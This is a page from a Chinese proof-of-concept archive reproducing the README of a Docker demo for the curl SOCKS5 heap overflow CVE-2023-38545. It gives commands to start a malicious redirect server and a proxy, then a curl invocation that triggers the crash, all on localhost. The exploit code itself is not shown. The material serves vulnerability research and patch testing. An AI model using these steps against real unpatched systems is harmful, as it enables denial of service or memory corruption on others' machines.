目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2023-38545 PoC — curl 缓冲区错误漏洞

来源
关联漏洞
标题: curl 缓冲区错误漏洞 (CVE-2023-38545)
Description:curl是一款用于从服务器传输数据或向服务器传输数据的工具。 curl 7.69.0至8.3.0版本存在安全漏洞,该漏洞源于SOCKS5存在堆栈溢出漏洞。
Description
Dockerfile containing all the necessary setup files to demo the exploit 
介绍
# Quick description

This showcases the cURL CVE-2023-38545. It is as lightweight as I could make it.

# Setup

First, build the Docker Image:

`docker build . -t cveimage`

Next, we can simply run the image file, creating a temporary Docker Container which will get deleted once the container is stopped:

`docker run --rm --tty --net="host" --name cvecontainer cveimage`

If you are struggling to type commands, simply open another terminal and run:

`docker exec -it cvecontainer /bin/bash`

Now, we need to start all the services. Connect to the already-running container, and run:

`./exploit/malicious_redirect_server.sh &`

`python3 /exploit/proxy.py &`

Now, from inside the container you can see the cURL exploit in action:

`curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000`

You must see a segmentation fault error on the machine that ran the curl command to know that the exploit succeeded. If you do not see it, either the exploit did not occur, or the process had so much heap space available that you did not overwrite into inaccessible memory.

# More work (PRs welcome)

* Make this README look pretty 
* Configure systemd to automatically start the exploit code
* Reduce Docker Image build time and size
* Anything/everything else. . .?

# References

* The socks5 proxy is not self-made. The original code for the proxy can be found here: https://github.com/alexbers/tgsocksproxy
* * Originally exploited in ubuntu (wsl) with systemd support: https://github.com/aire1/mtproxy_autoinstaller
* The hackerone report, which saved tons of research time. Give this a read through if you want to understand how this exploit occurs: https://hackerone.com/reports/2187833
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →